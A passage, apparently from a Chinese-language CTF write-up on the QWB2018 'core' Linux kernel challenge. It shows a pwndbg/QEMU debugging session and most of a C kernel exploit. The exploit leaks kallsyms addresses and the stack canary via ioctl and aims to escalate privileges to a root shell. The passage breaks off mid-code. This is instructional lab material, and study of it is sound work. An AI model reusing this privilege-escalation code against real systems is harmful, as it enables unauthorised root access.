class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">// qemu 内 / <span class="c1"># cat /sys/module/core/sections/.text</span> 0xffffffffc018b000 ...... ...... // qemu 外 give_to_player <span class="o">[</span>master●●<span class="o">]</span> gdb ./vmlinux -q pwndbg: loaded <span class="m">174</span> commands. Type pwndbg <span class="o">[</span>filter<span class="o">]</span> <span class="k">for</span> a list. pwndbg: created <span class="nv">$rebase</span>, <span class="nv">$ida</span> gdb functions <span class="o">(</span>can be used with print/break<span class="o">)</span> Reading symbols from ./vmlinux...<span class="o">(</span>no debugging symbols found<span class="o">)</span>...done. pwndbg&gt; add-symbol-file ./core.ko 0xffffffffc018b000 add symbol table from file <span class="s2">&#34;./core.ko&#34;</span> at .text_addr <span class="o">=</span> 0xffffffffc018b000 Reading symbols from ./core.ko...<span class="o">(</span>no debugging symbols found<span class="o">)</span>...done. pwndbg&gt; b core_read <span class="c1"># 加载了符号表，就可以直接对函数下断点了</span> Breakpoint <span class="m">1</span> at 0xffffffffc018b063 pwndbg&gt; b *<span class="o">(</span>0xffffffffc018b000+0xCC<span class="o">)</span><span class="c1"># 或者根据基地址直接下断点</span> Breakpoint <span class="m">2</span> at 0xffffffffc018b0cc pwndbg&gt; target remote localhost:1234 Remote debugging using localhost:1234 ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! 0xffffffffa1e6e7d2 in ?? <span class="o">()</span> ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! LEGEND: STACK <span class="p">|</span> HEAP <span class="p">|</span> CODE <span class="p">|</span> DATA <span class="p">|</span> RWX <span class="p">|</span> RODATA ──────────────────────────────────────<span class="o">[</span> REGISTERS <span class="o">]</span>────────────────────────────────────── RAX 0xffffffffa1e6e7d0 ◂— sti /* 0x2e66001f0fc3f4fb */ RBX 0xffffffffa2810480 ◂— 0x80000000 RCX 0x0 RDX 0x0 RDI 0x0 RSI 0x0 R8 0xffff8f250641bf20 —▸ 0xffffb0f380647960 ◂— <span class="m">1</span> R9 0x0 R10 0x0 R11 0x32e R12 0xffffffffa2810480 ◂— 0x80000000 R13 0xffffffffa2810480 ◂— 0x80000000 R14 0x0 R15 0x0 RBP 0x0 RSP 0xffffffffa2803eb8 —▸ 0xffffffffa16b65a0 ◂— 0xff894cf6894c9feb RIP 0xffffffffa1e6e7d2 ◂— ret /* 0x1f0f2e66001f0fc3 */ ───────────────────────────────────────<span class="o">[</span> DISASM <span class="o">]</span>──────────────────────────────────────── ► 0xffffffffa1e6e7d2 ret &lt;0xffffffffa16b65a0&gt; ↓ 0xffffffffa16b65a0 jmp 0xffffffffa16b6541 ↓ 0xffffffffa16b6541 or byte ptr ds:<span class="o">[</span>r12 + 2<span class="o">]</span>, 0x20 0xffffffffa16b6548 pushfq 0xffffffffa16b6549 pop rax 0xffffffffa16b654a <span class="nb">test</span> ah, <span class="m">2</span> 0xffffffffa16b654d je 0xffffffffa16b65e5 0xffffffffa16b6553 call 0xffffffffa16d4720 0xffffffffa16b6558 call 0xffffffffa16b6430 0xffffffffa16b655d mov rax, qword ptr <span class="o">[</span>rbx<span class="o">]</span> 0xffffffffa16b6560 <span class="nb">test</span> al, <span class="m">8</span> ────────────────────────────────────────<span class="o">[</span> STACK <span class="o">]</span>──────────────────────────────────────── 00:0000│ rsp 0xffffffffa2803eb8 —▸ 0xffffffffa16b65a0 ◂— 0xff894cf6894c9feb 01:0008│ 0xffffffffa2803ec0 ◂— 0xc2 02:0010│ 0xffffffffa2803ec8 —▸ 0xffffffffa2cc4900 ◂— 0xcccccccccccccccc 03:0018│ 0xffffffffa2803ed0 —▸ 0xffff8f2506688900 ◂— jb 0xffff8f2506688971 /* 0x65642f3d746f6f72<span class="p">;</span> <span class="s1">&#39;root=/dev/ram&#39;</span> */ 04:0020│ 0xffffffffa2803ed8 —▸ 0xffffffffa2ccc2c0 ◂— 0xcccccccccccccccc 05:0028│ 0xffffffffa2803ee0 ◂— 0x0 ... ↓ 07:0038│ 0xffffffffa2803ef0 —▸ 0xffffffffa16b673a ◂— jmp 0xffffffffa16b6735 /* 0x564190909090f9eb */ pwndbg&gt; c Continuing. ...... ...... // qemu 内 / <span class="c1"># /tmp/exploit</span> <span class="o">[</span>*<span class="o">]</span>status has been saved. commit_creds addr: 0xffffffffa169c8e0 vmlinux_base addr: 0xffffffffa1600000 prepare_kernel_cred addr: 0xffffffffa169cce0 <span class="o">[</span>*<span class="o">]</span><span class="nb">set</span> off to <span class="m">64</span> <span class="o">[</span>*<span class="o">]</span><span class="nb">read</span> to buf. ...... ...... // qemu 外 pwndbg&gt; c Continuing. ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! ERROR: Could not find ELF base! Breakpoint 1, 0xffffffffc018b063 in core_read <span class="o">()</span> ERROR: Could not find ELF base! ERROR: Could not find ELF base! LEGEND: STACK <span class="p">|</span> HEAP <span class="p">|</span> CODE <span class="p">|</span> DATA <span class="p">|</span> RWX <span class="p">|</span> RODATA ──────────────────────────────────────<span class="o">[</span> REGISTERS <span class="o">]</span>────────────────────────────────────── RAX 0xffffffffc018b15f <span class="o">(</span>core_ioctl<span class="o">)</span> ◂— cmp esi, 0x6677889b /* 0x48536677889bfe81 */ RBX 0x7ffee6e56f10 ◂— <span class="m">0</span> RCX 0x0 RDX 0x7ffee6e56f10 ◂— <span class="m">0</span> RDI 0x7ffee6e56f10 ◂— <span class="m">0</span> RSI 0x6677889b R8 0xffff8f25071b38ac ◂— <span class="m">1</span> R9 0x1 R10 0x0 R11 0x0 R12 0xffff8f250540b7a0 ◂— mov dh, 0x81 /* 0x581b6 */ R13 0x6677889b R14 0x7ffee6e56f10 ◂— <span class="m">0</span> R15 0x0 RBP 0x7ffee6e56f10 ◂— <span class="m">0</span> RSP 0xffffb0f3800dbe68 —▸ 0xffffffffc018b19b <span class="o">(</span>core_ioctl+60<span class="o">)</span> ◂— 0xc7c748d6894818eb RIP 0xffffffffc018b063 <span class="o">(</span>core_read<span class="o">)</span> ◂— push rbx /* 0x7bc7c748fb894853 */ ───────────────────────────────────────<span class="o">[</span> DISASM <span class="o">]</span>──────────────────────────────────────── ► 0xffffffffc018b063 &lt;core_read&gt; push rbx 0xffffffffc018b064 &lt;core_read+1&gt; mov rbx, rdi 0xffffffffc018b067 &lt;core_read+4&gt; mov rdi, -0x3fe73f85 0xffffffffc018b06e &lt;core_read+11&gt; sub rsp, 0x48 0xffffffffc018b072 &lt;core_read+15&gt; mov rax, qword ptr gs:<span class="o">[</span>0x28<span class="o">]</span> 0xffffffffc018b07b &lt;core_read+24&gt; mov qword ptr <span class="o">[</span>rsp + 0x40<span class="o">]</span>, rax 0xffffffffc018b080 &lt;core_read+29&gt; xor eax, eax 0xffffffffc018b082 &lt;core_read+31&gt; call 0xffffffffa16c6845 0xffffffffc018b087 &lt;core_read+36&gt; mov rsi, qword ptr <span class="o">[</span>rip + 0x2b72<span class="o">]</span> 0xffffffffc018b08e &lt;core_read+43&gt; mov rdx, rbx 0xffffffffc018b091 &lt;core_read+46&gt; mov rdi, -0x3fe73f6b ────────────────────────────────────────<span class="o">[</span> STACK <span class="o">]</span>──────────────────────────────────────── 00:0000│ rsp 0xffffb0f3800dbe68 —▸ 0xffffffffc018b19b <span class="o">(</span>core_ioctl+60<span class="o">)</span> ◂— 0xc7c748d6894818eb 01:0008│ 0xffffb0f3800dbe70 —▸ 0xffff8f25071b3840 ◂— add qword ptr <span class="o">[</span>r8<span class="o">]</span>, rax /* 0x81b6f000014b */ 02:0010│ 0xffffb0f3800dbe78 —▸ 0xffffffffa17dd6d1 ◂— 0xe824048948df8948 03:0018│ 0xffffb0f3800dbe80 ◂— 0x889b 04:0020│ 0xffffb0f3800dbe88 —▸ 0xffff8f2507680d00 ◂— <span class="m">0</span> 05:0028│ 0xffffb0f3800dbe90 —▸ 0xffffffffa178ecfa ◂— 0x9e840ffffffdfd3d 06:0030│ 0xffffb0f3800dbe98 —▸ 0xffffb0f3800dbe70 —▸ 0xffff8f25071b3840 ◂— add qword ptr <span class="o">[</span>r8<span class="o">]</span>, rax /* 0x81b6f000014b */ 07:0038│ 0xffffb0f3800dbea0 ◂— 0x10 Breakpoint core_read pwndbg&gt; </code></pre></td></tr></table> </div> </div><p>最终 <a href="https://github.com/bash-c/pwn_repo/blob/master/QWB2018_core/rop.c">exp</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">QWB2018_core</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">exploit</span><span class="p">.</span><span class="n">c</span> <span class="c1">// gcc exploit.c -static -masm=intel -g -o exploit </span><span class="c1"></span><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/ioctl.h&gt;</span><span class="cp"> </span><span class="cp"></span> <span class="kt">void</span> <span class="n">spawn_shell</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">getuid</span><span class="p">())</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]spawn shell error!&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="n">size_t</span> <span class="n">commit_creds</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">prepare_kernel_cred</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">size_t</span> <span class="n">raw_vmlinux_base</span> <span class="o">=</span> <span class="mh">0xffffffff81000000</span><span class="p">;</span> <span class="cm">/* </span><span class="cm"> * give_to_player [master●●] check ./core.ko </span><span class="cm"> ./core.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=549436d </span><span class="cm"> [*] &#39;/home/m4x/pwn_repo/QWB2018_core/give_to_player/core.ko&#39; </span><span class="cm"> Arch: amd64-64-little </span><span class="cm"> RELRO: No RELRO </span><span class="cm"> Stack: Canary found </span><span class="cm"> NX: NX enabled </span><span class="cm"> PIE: No PIE (0x0) </span><span class="cm">*/</span> <span class="n">size_t</span> <span class="n">vmlinux_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">size_t</span> <span class="nf">find_symbols</span><span class="p">()</span> <span class="p">{</span> <span class="n">FILE</span><span class="o">*</span> <span class="n">kallsyms_fd</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&#34;/tmp/kallsyms&#34;</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span> <span class="cm">/* FILE* kallsyms_fd = fopen(&#34;./test_kallsyms&#34;, &#34;r&#34;); */</span> <span class="k">if</span><span class="p">(</span><span class="n">kallsyms_fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]open kallsyms error!&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x30</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="k">while</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="n">kallsyms_fd</span><span class="p">))</span> <span class="p">{</span> <span class="k">if</span><span class="p">(</span><span class="n">commit_creds</span> <span class="o">&amp;</span> <span class="n">prepare_kernel_cred</span><span class="p">)</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;commit_creds&#34;</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">commit_creds</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* puts(buf); */</span> <span class="kt">char</span> <span class="n">hex</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">strncpy</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> <span class="cm">/* printf(&#34;hex: %s\n&#34;, hex); */</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="s">&#34;%llx&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">commit_creds</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;commit_creds addr: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">commit_creds</span><span class="p">);</span> <span class="cm">/* </span><span class="cm"> * give_to_player [master●●] bpython </span><span class="cm"> bpython version 0.17.1 on top of Python 2.7.15 /usr/bin/n </span><span class="cm"> &gt;&gt;&gt; from pwn import * </span><span class="cm"> &gt;&gt;&gt; vmlinux = ELF(&#34;./vmlinux&#34;) </span><span class="cm"> [*] &#39;/home/m4x/pwn_repo/QWB2018_core/give_to_player/vmli&#39; </span><span class="cm"> Arch: amd64-64-little </span><span class="cm"> RELRO: No RELRO </span><span class="cm"> Stack: Canary found </span><span class="cm"> NX: NX disabled </span><span class="cm"> PIE: No PIE (0xffffffff81000000) </span><span class="cm"> RWX: Has RWX segments </span><span class="cm"> &gt;&gt;&gt; hex(vmlinux.sym[&#39;commit_creds&#39;] - 0xffffffff81000000) </span><span class="cm"> &#39;0x9c8e0&#39; </span><span class="cm"> */</span> <span class="n">vmlinux_base</span> <span class="o">=</span> <span class="n">commit_creds</span> <span class="o">-</span> <span class="mh">0x9c8e0</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;vmlinux_base addr: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">vmlinux_base</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;prepare_kernel_cred&#34;</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">prepare_kernel_cred</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* puts(buf); */</span> <span class="kt">char</span> <span class="n">hex</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">strncpy</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="s">&#34;%llx&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">prepare_kernel_cred</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;prepare_kernel_cred addr: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">prepare_kernel_cred</span><span class="p">);</span> <span class="n">vmlinux_base</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span> <span class="o">-</span> <span class="mh">0x9cce0</span><span class="p">;</span> <span class="cm">/* printf(&#34;vmlinux_base addr: %p\n&#34;, vmlinux_base); */</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">prepare_kernel_cred</span> <span class="o">&amp;</span> <span class="n">commit_creds</span><span class="p">))</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]Error!&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="n">size_t</span> <span class="n">user_cs</span><span class="p">,</span> <span class="n">user_ss</span><span class="p">,</span> <span class="n">user_rflags</span><span class="p">,</span> <span class="n">user_sp</span><span class="p">;</span> <span class="kt">void</span> <span class="nf">save_status</span><span class="p">()</span> <span class="p">{</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">&#34;mov user_cs, cs;&#34;</span> <span class="s">&#34;mov user_ss, ss;&#34;</span> <span class="s">&#34;mov user_sp, rsp;&#34;</span> <span class="s">&#34;pushf;&#34;</span> <span class="s">&#34;pop user_rflags;&#34;</span> <span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]status has been saved.&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">set_off</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">idx</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[*]set off to %ld</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x6677889C</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">core_read</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]read to buf.&#34;</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x6677889B</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">core_copy_func</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[*]copy from user with size: %ld</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x6677889A</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">save_status</span><span class="p">();</span> <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/proc/core&#34;</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]open /proc/core error!&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="n">find_symbols</span><span class="p">();</span> <span class="c1">// gadget = raw_gadget - raw_vmlinux_base + vmlinux_base; </span><span class="c1"></span> <span class="n">ssize_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">vmlinux_base</span> <span class="o">-</span> <span class="n">raw_vmlinux_base</span><span class="p">;</span> <span class="n">set_off</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">);</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x40</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">core_read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="n">size_t</span> <span class="n">canary</span> <span class="o">=</span> <span class="p">((</span><span class="n">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[+]canary: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">canary</span><span 